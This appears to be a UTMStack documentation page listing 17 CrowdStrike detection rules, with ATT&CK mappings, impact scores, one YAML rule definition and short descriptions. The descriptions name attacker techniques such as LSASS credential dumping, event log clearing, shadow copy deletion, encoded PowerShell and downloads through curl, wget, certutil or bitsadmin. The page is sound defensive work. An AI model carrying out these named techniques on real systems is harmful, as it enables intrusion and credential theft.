UTMSTACK logoUTMSTACK logo
Antivirus CrowdStrike

Detection rules for CrowdStrike data sources. Each rule includes its MITRE ATT&CK mapping, impact rating, and a description of what it detects.

This category contains 17 detection rules.

RuleCategoryTechniqueImpact (C/I/A)
Critical Role Modification (Privilege Escalation)Privilege EscalationAccount Manipulation: Additional Cloud RolesC:3 / I:3 / A:1
CrowdStrike Hunting: Windows Event Log ClearingDefense EvasionIndicator Removal: Clear Windows Event LogsC:0 / I:3 / A:2
Custom Indicator of Compromise (IoC) DetectedThreat DetectionUser ExecutionC:3 / I:3 / A:1
Deletion or Deactivation of User AccountAccount ManipulationAccount ManipulationC:0 / I:3 / A:3
Endpoint Network Containment ActionImpactAccount Access RemovalC:0 / I:2 / A:3
Endpoint or XDR Detection AlertThreat DetectionCommand and Scripting InterpreterC:3 / I:3 / A:2
IP Whitelisting ModificationDefense EvasionImpair Defenses: Disable or Modify Cloud FirewallC:1 / I:3 / A:2
Inhibit System Recovery (Shadow Copy Deletion)ImpactInhibit System RecoveryC:0 / I:3 / A:3
Major Incident Generated (CrowdScore)Lateral MovementLateral Tool TransferC:3 / I:3 / A:3
Multiple Authentication Failures (Possible Brute Force Attack)Credential AccessBrute Force: Password GuessingC:3 / I:0 / A:0
OS Credential Dumping ActivityCredential AccessOS Credential Dumping: LSASS MemoryC:3 / I:1 / A:0
Real-Time Response (RTR) Session ExecutionExecutionRemote ServicesC:3 / I:3 / A:1
Security Defenses Impaired or Policy DisabledDefense EvasionImpair Defenses: Disable or Modify ToolsC:0 / I:3 / A:3
Security Policy Disabled or DeletedDefense EvasionImpair Defenses: Disable or Modify ToolsC:1 / I:3 / A:3
Suspicious Downloader Execution (Linux/macOS)Command and ControlIngress Tool TransferC:2 / I:2 / A:0
Suspicious Encoded PowerShell ExecutionExecutionCommand and Scripting Interpreter: PowerShellC:3 / I:2 / A:1
Suspicious Native Downloaders (LoLBin)Command and ControlIngress Tool TransferC:2 / I:2 / A:0

Rule Example

Below is an example of a rule definition for Critical Role Modification (Privilege Escalation) (view in repository):

name: "Critical Role Modification (Privilege Escalation)"
description: "New roles have been granted or updated for a user within the CrowdStrike administration console."
category: "Privilege Escalation"
technique: "Account Manipulation: Additional Cloud Roles"
references:
  - "https://attack.mitre.org/techniques/T1098/003/"
dataTypes:
  - crowdstrike
adversary: origin
impact:
  confidentiality: 3
  integrity: 3
  availability: 1
where: >
  exists("log.eventOperationName") && 
  oneOf("log.eventOperationName", ["grantUserRoles", "updateUserRoles"])
groupBy:
  - lastEvent.log.eventUserId
  - lastEvent.log.eventOperationName

Rule Details

Critical Role Modification (Privilege Escalation)

New roles have been granted or updated for a user within the CrowdStrike administration console.

CrowdStrike Hunting: Windows Event Log Clearing

A raw process execution was detected attempting to clear Windows Event Logs. Adversaries use this technique to cover their tracks after compromising a host.

Custom Indicator of Compromise (IoC) Detected

The sensor has detected activity that matches an IoC (Hash, Domain, IP) supplied and entered by the client.

Deletion or Deactivation of User Account

An administrator has deactivated or deleted a user account in the Falcon console. This indicates account manipulation.

Endpoint Network Containment Action

Containment of a host on the network has been requested, or a previously applied containment has been lifted.

Endpoint or XDR Detection Alert

A critical detection summary has been generated from Falcon EPP or XDR indicating malicious activity or attack patterns.

IP Whitelisting Modification

IP addresses have been added to or removed from the CrowdStrike whitelist. An attacker could use this to evade network blocking.

Inhibit System Recovery (Shadow Copy Deletion)

The Falcon agent detected command line activity attempting to delete Volume Shadow Copies or disable recovery options. This is a highly reliable precursor to Ransomware encryption.

Major Incident Generated (CrowdScore)

The CrowdScore engine has consolidated multiple detections into a critical incident, a possible indicator of Lateral Movement or widespread intrusion.

Multiple Authentication Failures (Possible Brute Force Attack)

A user or IP address has failed multiple authentication attempts on the CrowdStrike Falcon console within a short period of time.

OS Credential Dumping Activity

The endpoint agent detected activity commonly associated with OS Credential Dumping. This includes attempts to read or dump LSASS memory using known tools.

Real-Time Response (RTR) Session Execution

A user or API has initiated a remote response (RTR) session on an endpoint. This grants deep access to the host.

Security Defenses Impaired or Policy Disabled

An action was taken on the endpoint that resulted in a critical sensor process or security policy being disabled locally. This strongly indicates defense evasion tampering.

Security Policy Disabled or Deleted

An administrator or actor has disabled or deleted a security prevention policy in Falcon, which may leave endpoints vulnerable.

Suspicious Downloader Execution (Linux/macOS)

Execution of native downloaders like curl or wget was detected on a Linux or macOS endpoint making HTTP connections, potentially indicating Ingress Tool Transfer by an adversary.

Suspicious Encoded PowerShell Execution

A PowerShell process was spawned with arguments indicating base64 encoded commands (-enc, -EncodedCommand). Malware and threat actors often use this to evade string-based detection.

Suspicious Native Downloaders (LoLBin)

Execution of native binaries like certutil, bitsadmin, curl, or wget was detected making external connections, potentially indicating Ingress Tool Transfer by an adversary.